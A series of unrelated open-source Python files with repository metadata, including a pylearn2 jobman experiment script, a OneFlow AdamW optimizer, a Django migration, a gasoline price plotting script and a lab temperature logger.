Actually, we add the job here and it can be launched later as usual
(please check how to start jobs using jobman from the jobman tutorial
website)
"""
from jobman.tools import DD, flatten
from jobman import api0, sql
from pylearn2.scripts.jobman import experiment
def result_extractor(train_obj):
"""
This is a user specific function, that is used by jobman to extract results
The returned dictionary will be saved in state.results
"""
import numpy
channels = train_obj.model.monitor.channels
train_cost = channels['sgd_cost(ExhaustiveSGD[X])']
best_epoch = numpy.argmin(train_cost.val_record)
best_rec_error = train_cost.val_record[best_epoch]
batch_num = train_cost.batch_record[best_epoch]
return dict(
best_epoch=best_epoch,
train_rec_error=best_rec_error,
batch_num=batch_num)
if __name__ == '__main__':
db = api0.open_db('sqlite:///test.db?table=test_jobman_pylearn2')
state = DD()
state.yaml_template = '''
!obj:pylearn2.train.Train {
"dataset": !obj:pylearn2.datasets.npy_npz.NpyDataset &dataset {
"file" : "%(file)s"
},
"model": !obj:pylearn2.autoencoder.ContractiveAutoencoder {
"nvis" : %(nvis)d,
"nhid" : %(nhid)d,
"irange" : 0.05,
"act_enc": "sigmoid", #for some reason only sigmoid function works
"act_dec": "sigmoid",
},
"algorithm": !obj:pylearn2.training_algorithms.sgd.SGD {
"learning_rate" : %(learning_rate)f,
"batch_size" : %(batch_size)d,
"monitoring_batches" : 5,
"monitoring_dataset" : *dataset,
"cost" : !obj:pylearn2.costs.cost.SumOfCosts {
"costs": [
[1.0, !obj:pylearn2.costs.autoencoder.MeanBinaryCrossEntropy {} ],
[%(coefficient)f, !obj:pylearn2.costs.cost.MethodCost { method: 'contraction_penalty' } ]
]
},
"termination_criterion" : %(term_crit)s,
}
}
'''
state.hyper_parameters = {
"file": "${PYLEARN2_DATA_PATH}/UTLC/pca/sylvester_train_x_pca32.npy",
"nvis": 32,
"nhid": 6,
"learning_rate": 0.1,
"batch_size": 10,
"coefficient": 0.5,
"term_crit": {
"__builder__": "pylearn2.training_algorithms.sgd.EpochCounter",
"max_epochs": 2
}
}
state.extract_results = "pylearn2.scripts.jobman.tester.result_extractor"
sql.insert_job(
experiment.train_experiment,
flatten(state),
db,
force_dup=True)
|
[
"lionelpigou@gmail.com"
] |
lionelpigou@gmail.com
|
77f509fce29adca2f0ee33c911a594f1f01a20a5
|
f2e503885666f35f9c50c9cff411c3a47fb81093
|
/andelabs1.py
|
fd8af25851ab59ffa321b1e06b42dd65a50dd245
|
[] |
no_license
|
SamwelOpiyo/andelabs
|
87c7a6b0ae078afd0a4b620dc4f0a7ba898e006c
|
fa7b6fe14f3942d2ee47f81e6a78a375dd7e2210
|
refs/heads/master
| 2021-01-09T20:43:23.986700
| 2017-01-22T19:45:19
| 2017-01-22T19:45:19
| 65,727,292
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 456
|
py
|
def prime_check(n):
    # Helper assumed by the original code but not defined there:
    # returns True if n is prime.
    for d in range(2, int(n ** 0.5) + 1):
        if n % d == 0:
            return False
    return n >= 2
def prime():
    integer = int(raw_input("Enter an Integer:"))
    prime_list = list()
    if integer == 2:
        prime_list.append(integer)
    elif integer == 3:
        prime_list.append(2)
        prime_list.append(integer)
    else:
        prime_list.append(2)
        prime_list.append(3)
        for k in range(4, integer + 1):
            if prime_check(k):
                prime_list.append(k)
    return prime_list
print prime()
|
[
"root@localhost.localdomain"
] |
root@localhost.localdomain
|
58aad0ee9098bd5db56320c38d09085fce097091
|
9023909d2776e708755f98d5485c4cffb3a56000
|
/oneflow/compatible_single_client_python/nn/optimizer/adamw.py
|
a4f8cddbc181f472ebc8eeb4a1f3cbfcd18a3c89
|
[
"Apache-2.0"
] |
permissive
|
sailfish009/oneflow
|
f6cf95afe67e284d9f79f1a941e7251dfc58b0f7
|
4780aae50ab389472bd0b76c4333e7e0a1a56ef7
|
refs/heads/master
| 2023-06-24T02:06:40.957297
| 2021-07-26T09:35:29
| 2021-07-26T09:35:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,090
|
py
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from typing import List, Dict, Callable, Union, Iterator, Tuple
import collections
from oneflow.compatible import single_client as flow
from oneflow.compatible.single_client.python.oneflow_export import (
oneflow_export,
experimental_api,
)
from oneflow.compatible.single_client.python.nn.parameter import Parameter
from oneflow.compatible.single_client.python.nn.optimizer.optimizer import (
ParamGroup,
Optimizer,
)
@oneflow_export("optim.AdamW")
@experimental_api
class AdamW(Optimizer):
r"""Implements AdamW algorithm.
The original Adam algorithm was proposed in `Adam: A Method for Stochastic Optimization`_.
The AdamW variant was proposed in `Decoupled Weight Decay Regularization`_.
This is the optimizer of the Adam-weight-decay algorithm
(for more details, please refer to `Adam-weight-decay <https://www.fast.ai/2018/07/02/adam-weight-decay/>`_),
which decouples the weight decay term from the gradient update.
The parameter update equations are:
.. math::
& V_t = \beta_1*V_{t-1} + (1-\beta_1)*grad
& S_t = \beta_2*S_{t-1} + (1-\beta_2)*{grad} \odot {grad}
& \hat{g} = learning\_rate*(\frac{{V_t}}{\sqrt{{S_t}}+\epsilon}+\lambda*param_{old})
& param_{new} = param_{old} - \hat{g}
Args:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float, optional): learning rate (default: 1e-3)
betas (Tuple[float, float], optional): coefficients used for computing
running averages of gradient and its square (default: (0.9, 0.999))
eps (float, optional): term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (λ in the equations above; default: 0)
scale (float, optional): the scale factor of loss (default: 1.0)
.. _Adam\: A Method for Stochastic Optimization:
https://arxiv.org/abs/1412.6980
.. _Decoupled Weight Decay Regularization:
https://arxiv.org/abs/1711.05101
"""
def __init__(
self,
parameters: Union[Iterator[Parameter], List[Dict]],
lr: float = 1e-3,
betas: Tuple[float, float] = (0.9, 0.999),
eps: float = 1e-8,
weight_decay: float = 0,
amsgrad: bool = False,
scale: float = 1.0,
):
super().__init__()
assert lr >= 0.0, f"Invalid learning rate: {lr}"
assert eps >= 0.0, f"Invalid epsilon value: {eps}"
assert (
betas[0] >= 0.0 and betas[0] < 1.0
), f"Invalid beta parameter at index 0: {betas[0]}"
assert (
betas[1] >= 0.0 and betas[1] < 1.0
), f"Invalid beta parameter at index 1: {betas[1]}"
assert weight_decay >= 0.0, f"Invalid weight_decay value: {weight_decay}"
assert scale > 0.0, f"Invalid scale factor: {scale}"
assert amsgrad is False, "Not support AMSGrad now!"
self._default_options["lr"] = lr
self._default_options["eps"] = eps
self._default_options["betas"] = betas
self._default_options["weight_decay"] = weight_decay
self._default_options["amsgrad"] = amsgrad
self._default_options["scale"] = scale
# Add parameters
if isinstance(parameters, collections.abc.Iterator):
self.param_groups.append(ParamGroup(parameters, self._default_options))
else: # List[Dict]
for param in parameters:
self.param_groups.append(ParamGroup(param, self._default_options))
for param_group in self.param_groups:
for param in param_group.parameters:
assert param.is_leaf, "parameters must be leaf tensor"
self._state[param] = dict()
self._state[param]["exp_avg"] = flow.experimental.zeros_like(param)
self._state[param]["exp_avg_sq"] = flow.experimental.zeros_like(param)
self._op = (
flow.builtin_op("adam_update")
.Input("model")
.Input("model_diff")
.Input("m")
.Input("v")
.Attr("l1", 0.0)
.Attr("l2", 0.0)
.Build()
)
def step(self, closure: Callable = None):
"""Performs a single optimization step.
Args:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
with flow.no_grad():
loss = None
if closure is not None:
loss = closure()
for param_group in self.param_groups:
kwargs = {
"learning_rate_val": param_group["lr"],
"scale": param_group["scale"],
"weight_decay": param_group["weight_decay"],
"beta1": param_group["betas"][0],
"beta2": param_group["betas"][1],
"epsilon": param_group["eps"],
}
for param in param_group.parameters:
if param.grad is None:
continue
m_tensor = self._state[param]["exp_avg"]
v_tensor = self._state[param]["exp_avg_sq"]
self._op(
param, param.grad, m_tensor, v_tensor, **kwargs,
)
self._state["step"] = self._state["step"] + 1
return loss
|
[
"noreply@github.com"
] |
sailfish009.noreply@github.com
|
b6eb79f493fa5f99d269963e332bfdb0f53613f0
|
f8c3c677ba536fbf5a37ac4343c1f3f3acd4d9b6
|
/ICA_SDK/test/test_subscription.py
|
b9856eade3bbf9f75b638633d6bce99d475b5031
|
[] |
no_license
|
jsialar/integrated_IAP_SDK
|
5e6999b0a9beabe4dfc4f2b6c8b0f45b1b2f33eb
|
c9ff7685ef0a27dc4af512adcff914f55ead0edd
|
refs/heads/main
| 2023-08-25T04:16:27.219027
| 2021-10-26T16:06:09
| 2021-10-26T16:06:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,819
|
py
|
# coding: utf-8
"""
IAP Services
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: v1
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import ICA_SDK
from ICA_SDK.models.subscription import Subscription # noqa: E501
from ICA_SDK.rest import ApiException
class TestSubscription(unittest.TestCase):
"""Subscription unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def make_instance(self, include_optional):
"""Test Subscription
include_optional is a boolean: when False only required
params are included, when True both required and
optional params are included """
# model = ICA_SDK.models.subscription.Subscription() # noqa: E501
if include_optional :
return Subscription(
id = '0',
urn = '0',
type = '0',
actions = [
'0'
],
filter_expression = '0',
name = '0',
description = '0',
delivery_target = ICA_SDK.models.delivery_target.DeliveryTarget(
aws_sns_topic = ICA_SDK.models.delivery_target_aws_sns_topic.DeliveryTargetAwsSnsTopic(
topic_arn = '0', ),
aws_sqs_queue = ICA_SDK.models.delivery_target_aws_sqs_queue.DeliveryTargetAwsSqsQueue(
queue_url = '0', ),
workflow_run_launch = ICA_SDK.models.delivery_target_workflow_run_launch.DeliveryTargetWorkflowRunLaunch(
id = '0',
version = '0',
name = '0',
input = ICA_SDK.models.input.input(), ), ),
match_identities = [
'0'
],
acl = [
'0'
],
tenant_id = '0',
created_by_user_id = '0',
time_created = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
deleted_by_user_id = '0',
time_deleted = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
is_deleted = True
)
else :
return Subscription(
)
def testSubscription(self):
"""Test Subscription"""
inst_req_only = self.make_instance(include_optional=False)
inst_req_and_optional = self.make_instance(include_optional=True)
if __name__ == '__main__':
unittest.main()
|
[
"siajunren@gmail.com"
] |
siajunren@gmail.com
|
a89de6c602a550c947a03e246638a7a409ca8899
|
878a3094430bb914717d641a4f4b06574e872518
|
/hm_00_python/hm_0x_编辑用.py
|
e3e42e7d8c6ae0ec59b41a29d979116092a16cdf
|
[] |
no_license
|
2020668/python2019
|
3f33eea85fdd3f2866d867859d5694abb71effe9
|
f8a98389fa09f95e72914afa4935afc5c68eaccd
|
refs/heads/master
| 2020-06-07T23:36:17.871376
| 2019-08-29T09:45:10
| 2019-08-29T09:45:10
| 193,116,002
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 208
|
py
|
def sum_2_num(num1, num2):
    """Sum two numbers."""
    return num1 + num2
# Call the function and receive the computed result in the result variable
result = sum_2_num(10, 20)
print("The result is: %d" % result)
|
[
"keen2020@outlook.com"
] |
keen2020@outlook.com
|
a361e33242f19d9a4224e3176f42124b93cac1ef
|
daf7f2ba83c57819e85356906919309933af4526
|
/util/validate-outputs.py
|
246d094723a6c9142614278f5d233e876eb43baa
|
[
"MIT"
] |
permissive
|
ihmwg/python-ihm
|
158514e6148fa6f2651548077cf386d4bbdf1483
|
ab685eaabd537a46184172cffe7a2f057343d390
|
refs/heads/main
| 2023-09-01T16:15:00.148446
| 2023-08-31T00:45:21
| 2023-08-31T00:45:21
| 123,497,102
| 17
| 8
|
MIT
| 2023-07-10T19:00:38
| 2018-03-01T21:57:40
|
Python
|
UTF-8
|
Python
| false
| false
| 976
|
py
|
#!/usr/bin/python3
"""Check the output of each example for validity against the PDBx
and IHM dictionaries.
This should be periodically rechecked in case the PDBx and IHM dictionaries
are updated.
"""
import sys
import os
import subprocess
import ihm.dictionary
import urllib.request
with urllib.request.urlopen(
'http://mmcif.wwpdb.org/dictionaries/ascii/mmcif_pdbx_v50.dic') as fh:
d_pdbx = ihm.dictionary.read(fh)
with urllib.request.urlopen(
'http://mmcif.wwpdb.org/dictionaries/ascii/mmcif_ihm.dic') as fh:
d_ihm = ihm.dictionary.read(fh)
pdbx_ihm = d_pdbx + d_ihm
for script in ('simple-docking.py', 'ligands_water.py',
'non_standard_residues.py'):
print(script)
subprocess.check_call([sys.executable, '../examples/' + script])
with open('output.cif') as fh:
try:
pdbx_ihm.validate(fh)
except ihm.dictionary.ValidatorError as exc:
print(exc)
os.unlink('output.cif')
|
[
"ben@salilab.org"
] |
ben@salilab.org
|
21e7a9d8d8ebbd2404e408c669c67da0b5559eb7
|
b0cdab54c5e81681125c01801148c287605ee8d0
|
/speciality/urls.py
|
74bbfe233256fb4a38f2fe7a7aa9036aae4aa4f5
|
[] |
no_license
|
lpd76/rdavid2
|
5528746749acc51d4d0f5efd77886929798e2569
|
18aa5120fe4ba0ea44f611dd52b008db52641f17
|
refs/heads/master
| 2020-04-13T20:47:58.141579
| 2019-01-17T16:51:31
| 2019-01-17T16:51:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 133
|
py
|
from django.urls import path
from . import views
urlpatterns = [
path('index', views.speciality_list, name='speciality_list'),
]
|
[
"louisphilippe.david@gmail.com"
] |
louisphilippe.david@gmail.com
|
dc82be647e361b442c5007d4a567670023744ff1
|
b420377a638dc9a5d8c09ebc39b0448d47ddb74e
|
/ddd-django/polls_app/base_site/views.py
|
6fe6e69eeec0dc6328f6242d5cb592395cd53429
|
[] |
no_license
|
shimakaze-git/drf-sample
|
d4e4e8e4d380f0b77e807d4bbf4e3f0d98ee6bcd
|
4294cd5adeea0ef51d3b7eee6a154d23dd089afc
|
refs/heads/master
| 2022-05-02T20:19:09.901257
| 2019-09-15T12:46:51
| 2019-09-15T12:46:51
| 205,698,781
| 0
| 0
| null | 2022-04-22T22:29:32
| 2019-09-01T15:52:14
|
Python
|
UTF-8
|
Python
| false
| false
| 626
|
py
|
from django.shortcuts import render
from django.http import HttpResponse
from django.views import View
class IndexView(View):
template_name = 'index.html'
def get(self, request):
context = {}
# return HttpResponse('test')
return render(request, self.template_name, context)
def post(self, request, *args, **kwargs):
print(request.POST)
context = {}
# return HttpResponse('test')
return render(request, self.template_name, context)
def index(request):
context = {}
# return HttpResponse('test')
return render(request, 'index.html', context)
|
[
"shimakaze.soft+github@googlemail.com"
] |
shimakaze.soft+github@googlemail.com
|
c355a985943e570ffb642a4967e78a28c1b18b0d
|
aca7ba7e5f801f89374ac4be3544ceb49889e59f
|
/data/diseases/importPgkbDis.py
|
81aac7a5322e0da4f0bbb60386ea2f6e8c024c63
|
[] |
no_license
|
strbean/pubMunch
|
582e47eadaeb5e204960c21d84d2eaf5d10b9726
|
c81d9935505779508df8e99577dd71cc104ea4ee
|
refs/heads/master
| 2020-03-21T10:22:57.685056
| 2018-06-24T05:05:37
| 2018-06-24T05:05:37
| 138,448,203
| 0
| 0
| null | 2018-06-24T02:43:32
| 2018-06-24T02:43:32
| null |
UTF-8
|
Python
| false
| false
| 258
|
py
|
for line in open("diseases.tsv"):
if line.startswith("PharmGKB"):
continue
fields = line.split("\t")
name = fields[1]
syns = fields[2].split('","')
syns = [s.strip('",') for s in syns]
print "%s\t%s" % (name, "|".join(syns))
|
[
"max@soe.ucsc.edu"
] |
max@soe.ucsc.edu
|
9fbbcf8154c05f7064a216d1d47c4fefd91bb5af
|
fa114e6fa2c642613ac67960911a21b91bfa5089
|
/Home-Services/store/migrations/0001_initial.py
|
fa40f81506df6858bf11007e732078db786f4829
|
[] |
no_license
|
AbdurRahman111/Home-Work-Services
|
122c533d440da82199a3d4b647cd0feadb582d54
|
7cb8495d90f980264f97606da120662c7cf56d47
|
refs/heads/master
| 2023-04-06T22:53:34.590306
| 2021-04-12T08:23:49
| 2021-04-12T08:23:49
| 357,113,994
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,280
|
py
|
# Generated by Django 3.1.4 on 2021-02-28 08:30
import datetime
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='Customer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=50)),
('last_name', models.CharField(max_length=50)),
('phone', models.CharField(max_length=15)),
('email', models.EmailField(max_length=254)),
('password', models.CharField(max_length=500)),
('aadhar', models.CharField(max_length=100)),
('address', models.CharField(max_length=100)),
('area', models.CharField(max_length=100)),
('landmark', models.CharField(max_length=100)),
('pincode', models.CharField(max_length=100)),
],
),
migrations.CreateModel(
name='Feedback',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('Appointment_id', models.CharField(max_length=200)),
('Service_provider_name', models.CharField(max_length=200)),
('Customer_name', models.CharField(max_length=200)),
('address', models.CharField(max_length=200)),
('Booking_date', models.CharField(max_length=200)),
('Completion_date', models.CharField(max_length=200)),
('Total_cost', models.CharField(max_length=50)),
('Review_Admin', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='ServiceProvider',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=50)),
('last_name', models.CharField(max_length=50)),
('phone', models.CharField(max_length=15)),
('email', models.EmailField(max_length=254)),
('password', models.CharField(max_length=500)),
('service_type', models.CharField(max_length=200)),
('aadhar', models.CharField(max_length=100)),
('address', models.CharField(max_length=100)),
('area', models.CharField(max_length=100)),
('landmark', models.CharField(max_length=100)),
('pincode', models.CharField(max_length=10)),
('image', models.ImageField(upload_to='media/profiles/')),
('date', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('price', models.IntegerField(default=0)),
('description', models.CharField(blank=True, default='', max_length=200, null=True)),
('image', models.ImageField(upload_to='media/products/')),
('complition_time', models.IntegerField(default=1)),
('category', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='store.category')),
('service_provider', models.ForeignKey(default=10, on_delete=django.db.models.deletion.CASCADE, to='store.serviceprovider')),
],
),
migrations.CreateModel(
name='Order',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('quantity', models.IntegerField(default=1)),
('price', models.IntegerField()),
('Service_date', models.CharField(blank=True, default='', max_length=50)),
('Time_slots', models.CharField(blank=True, default='', max_length=50)),
('date', models.DateField(default=datetime.datetime.today)),
('complition_date', models.DateField(default=datetime.datetime.today)),
('Accept_this_order', models.BooleanField(default=False)),
('Cancel_this_order', models.BooleanField(default=False)),
('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='store.customer')),
('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='store.product')),
('service_provider', models.ForeignKey(default=10, on_delete=django.db.models.deletion.CASCADE, to='store.serviceprovider')),
],
),
]
|
[
"mdabdurrahmanchowdhury1122@gmail.com"
] |
mdabdurrahmanchowdhury1122@gmail.com
|
1bd5242816fc5adefb64d1509e8712a63499e48a
|
1c0509a06cec726735048f00f63d2529f5e43ce6
|
/code_gasoline_france/analysis/analysis_dispersion/graphs/graphs_macro_trends.py
|
433290f30b21187244f88206ba00b34d93d9613b
|
[] |
no_license
|
etiennecha/master_code
|
e99c62e93aa052a66d4cdd3f3e3aa25a3aec4880
|
48821f6c854a1c6aa05cf81b653b3b757212b6f8
|
refs/heads/master
| 2021-01-23T14:35:45.904595
| 2018-03-11T18:57:38
| 2018-03-11T18:57:38
| 16,312,906
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,465
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import print_function
import add_to_path
from add_to_path import path_data
from generic_master_price import *
from generic_master_info import *
path_dir_built = os.path.join(path_data,
u'data_gasoline',
u'data_built',
u'data_scraped_2011_2014')
path_dir_built_csv = os.path.join(path_dir_built, u'data_csv')
path_dir_built_dis = os.path.join(path_data,
u'data_gasoline',
u'data_built',
u'data_dispersion')
path_dir_built_dis_json = os.path.join(path_dir_built_dis, 'data_json')
path_dir_built_dis_csv = os.path.join(path_dir_built_dis, 'data_csv')
path_dir_built_dis_graphs = os.path.join(path_dir_built_dis, 'data_graphs')
path_dir_built_other = os.path.join(path_data,
u'data_gasoline',
u'data_built',
u'data_other')
path_dir_built_other_csv = os.path.join(path_dir_built_other, 'data_csv')
pd.set_option('float_format', '{:,.3f}'.format)
format_float_int = lambda x: '{:10,.0f}'.format(x)
format_float_float = lambda x: '{:10,.2f}'.format(x)
from pylab import *
rcParams['figure.figsize'] = 16, 6
## french date format
#import locale
#locale.setlocale(locale.LC_ALL, 'fra_fra')
dir_graphs = 'color'
str_ylabel = 'Price (euro/liter)'
# #########
# LOAD DATA
# #########
# DF STATION INFO
df_info = pd.read_csv(os.path.join(path_dir_built_csv,
'df_station_info_final.csv'),
encoding = 'utf-8',
dtype = {'id_station' : str,
'adr_zip' : str,
'adr_dpt' : str,
'ci_1' : str,
'ci_ardt_1' :str,
'ci_2' : str,
'ci_ardt_2' : str,
'dpt' : str},
parse_dates = [u'day_%s' %i for i in range(4)]) # fix
df_info.set_index('id_station', inplace = True)
df_info = df_info[df_info['highway'] != 1]
# DF PRICES
df_prices_ht = pd.read_csv(os.path.join(path_dir_built_csv,
'df_prices_ht_final.csv'),
parse_dates = ['date'])
df_prices_ht.set_index('date', inplace = True)
df_prices_ttc = pd.read_csv(os.path.join(path_dir_built_csv,
'df_prices_ttc_final.csv'),
parse_dates = ['date'])
df_prices_ttc.set_index('date', inplace = True)
# DF QUOTATIONS (WHOLESALE GAS PRICES)
df_quotations = pd.read_csv(os.path.join(path_dir_built_other_csv,
'df_quotations.csv'),
encoding = 'utf-8',
parse_dates = ['date'])
df_quotations.set_index('date', inplace = True)
# REFINE GROUP TYPE
# beginning: ELF + need to use future info
# (todo: add TA with no detected margin chge?)
df_info.loc[((df_info['brand_0'] == 'ELF') |\
(df_info['brand_last'] == 'ESSO_EXPRESS')),
'group_type'] = 'DIS'
df_info.loc[(df_info['brand_last'].isin(['ELF',
'ESSO_EXPRESS',
'TOTAL_ACCESS'])),
'group_type_last'] = 'DIS'
## Further GMS refining
#ls_hypers = ['AUCHAN', 'CARREFOUR', 'GEANT', 'LECLERC', 'CORA',
# 'INTERMARCHE', 'SYSTEMEU']
#df_info.loc[(df_info['brand_0'].isin(ls_hypers)),
# 'group_type'] = 'HYP'
#df_info.loc[(df_info['brand_last'].isin(ls_hypers)),
# 'group_type_last'] = 'HYP'
# ###############################
# GRAPHS: MACRO TRENDS
# ###############################
ls_sup_dis_ids = df_info[(df_info['group_type_last'] == 'SUP') |
((df_info['group_type'] == 'DIS') &\
(df_info['group_type_last'] == 'DIS'))].index
ls_oil_ind_ids = df_info[(df_info['group_type_last'] == 'OIL') |
(df_info['group_type_last'] == 'IND')].index
df_quotations['UFIP Brent R5 EL'] = df_quotations['UFIP Brent R5 EB'] / 158.987
#df_quotations[['UFIP Brent R5 EL', 'Europe Brent FOB EL']].plot()
#plt.show()
df_macro = pd.DataFrame(df_prices_ht.mean(1).values,
columns = [u'All gas stations'],
index = df_prices_ht.index)
df_macro['Brent'] = df_quotations['UFIP Brent R5 EL']
df_macro[u'Supermarket & Discount'] = df_prices_ht[ls_sup_dis_ids].mean(1)
df_macro[u'Oil & Independent'] = df_prices_ht[ls_oil_ind_ids].mean(1)
# Column order determines legend
df_macro = df_macro[[u'Brent',
u'All gas stations',
u'Supermarket & Discount',
u'Oil & Independent']]
df_macro['Brent'] = df_macro['Brent'].fillna(method = 'bfill')
fig = plt.figure()
ax1 = fig.add_subplot(111)
ls_l = []
for col, ls, alpha, color in zip(df_macro.columns,
['-', '-', '-', '-'],
[1, 1, 1, 1],
['b', 'g', 'r', 'c']):
ls_l.append(ax1.plot(df_macro.index,
df_macro[col].values,
c = color, ls = ls, alpha = alpha,
label = col))
lns = ls_l[0] + ls_l[1] + ls_l[2] + ls_l[3]
labs = [l.get_label() for l in lns]
ax1.legend(lns, labs, loc=0)
ax1.grid()
# Show ticks only on left and bottom axis, out of graph
ax1.yaxis.set_ticks_position('left')
ax1.xaxis.set_ticks_position('bottom')
ax1.get_yaxis().set_tick_params(which='both', direction='out')
ax1.get_xaxis().set_tick_params(which='both', direction='out')
plt.xlabel('')
plt.ylabel(str_ylabel)
plt.tight_layout()
plt.savefig(os.path.join(path_dir_built_dis_graphs,
dir_graphs,
'macro_trends.png'),
bbox_inches='tight')
plt.close()
# #################
# GRAPH PRICE CHGES
# #################
zero = 1e-10
df_chges = df_prices_ttc - df_prices_ttc.shift(1)
#df_chges = df_chges.ix['2012-01-01':'2012-12-31']
se_neg_chges = df_chges[df_chges < - zero].count(1)
se_pos_chges = df_chges[df_chges > zero].count(1)
fig = plt.figure()
ax = plt.subplot(111)
b0 = ax.bar(se_neg_chges.index,
(-se_neg_chges).values,
lw=0,
alpha = 0.5,
color = 'b')
b1 = ax.bar(se_pos_chges.index,
se_pos_chges.values,
lw=0,
alpha = 0.5,
color = 'g')
ax.legend((b1[0], b0[0]), ('Price increases', 'Price decreases'))
# make it symmetric
ax.set_ylim(-7000, 7000)
ax.set_yticks((-7000, -5000, -3000, -1000, 0, 1000, 3000, 5000, 7000))
# abs value: number of price changes
ax.set_yticklabels([u'{:.0f}'.format(x) for x in np.abs(ax.get_yticks())])
ax.grid()
# Show ticks only on left and bottom axis, out of graph
ax.yaxis.set_ticks_position('left')
ax.xaxis.set_ticks_position('bottom')
ax.get_yaxis().set_tick_params(which='both', direction='out')
ax.get_xaxis().set_tick_params(which='both', direction='out')
plt.ylabel(u'Nb price changes')
plt.tight_layout()
plt.savefig(os.path.join(path_dir_built_dis_graphs,
dir_graphs,
'macro_vol_price_chges.png'),
bbox_inches='tight')
plt.close()
|
[
"echamayou@gmail.com"
] |
echamayou@gmail.com
|
43a5269c653fb02480325cb8c86fd6ac270b6181
|
ce661026009d622db924080d85ab529f1cae6b60
|
/codingbat.com/not_string.py
|
3a13b969ff38b7af6b31a1ef6b1b887e7e4db819
|
[] |
no_license
|
predavlad/projecteuler
|
d54f5d85ab0133b19b54b4168990b90f09a0184c
|
58e1637733bb7e01e44bfac707353ecfe84d9b19
|
refs/heads/master
| 2021-01-23T15:29:26.257019
| 2019-02-09T10:11:23
| 2019-02-09T10:11:23
| 12,952,194
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 208
|
py
|
def not_string(str):
if str[0:3] == 'not':
return str
return "not " + str
assert not_string('candy') == 'not candy'
assert not_string('x') == 'not x'
assert not_string('not bad') == 'not bad'
|
[
"preda.vlad@yahoo.com"
] |
preda.vlad@yahoo.com
|
c137abb7879efd8cba96903b886443f16417a424
|
e1292fb9f2b359f71fbc54a4eb6ae4cf0c1ff51d
|
/machines/towermain/temperature.py
|
0f2911f2ee9401ba811d95d931d6a99320f76880
|
[] |
no_license
|
JNRiedel/PyExpLabSys
|
879d5c6bf552e89134629f0c6ca011af67937c3d
|
b69daaa9c932b9264d9f731cc3f2091f31f5d36e
|
refs/heads/master
| 2020-04-08T08:45:17.466865
| 2014-08-22T11:06:24
| 2014-08-22T11:06:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,371
|
py
|
# -*- coding: utf-8 -*-
"""This script read the sample temperature from an Omega CNi3244_C24
temperature control unit and makes it available on a data socket. Furthermore,
it also log significant temperature points to the database.
"""
import time
from PyExpLabSys.drivers.omega import CNi3244_C24
from PyExpLabSys.common.sockets import DateDataSocket
from PyExpLabSys.common.loggers import ContinuousLogger
from PyExpLabSys.common.utilities import get_logger
LOGGER = get_logger('temperature', level='INFO', file_log=True,
file_name='temperature_log')
TEMPERATURE_CHANGE_THRESHOLD = 0.3
TIMEOUT = 600
SHORT_NAME = 'tts'
NAME = 'tower_temperature_sample'
def main_measure_loop(cni, socket, db_logger):
"""The main measuring loop"""
last_temp = -100000
last_time = 0
while True:
# Current values
now = time.time()
current = cni.read_temperature()
        # The read_temperature returns None if no thermocouple is connected
if current is not None:
# Set point on socket
socket.set_point_now(SHORT_NAME, current)
# Log if required
if now - last_time > TIMEOUT or\
abs(current - last_temp) > TEMPERATURE_CHANGE_THRESHOLD:
db_logger.enqueue_point_now('tower_temperature_sample',
current)
LOGGER.info('Value {} sent'.format(current))
last_time = now
last_temp = current
def main():
LOGGER.info('main started')
cni = CNi3244_C24(0)
socket = DateDataSocket([SHORT_NAME], timeouts=1.0)
socket.start()
db_logger = ContinuousLogger(
table='dateplots_tower', username='N/A', password='N/A',
measurement_codenames=[NAME],
dsn='servcinf'
)
db_logger.start()
time.sleep(0.1)
# Main part
try:
main_measure_loop(cni, socket, db_logger)
except KeyboardInterrupt:
LOGGER.info('Keyboard Interrupt. Shutting down!')
db_logger.stop()
cni.close()
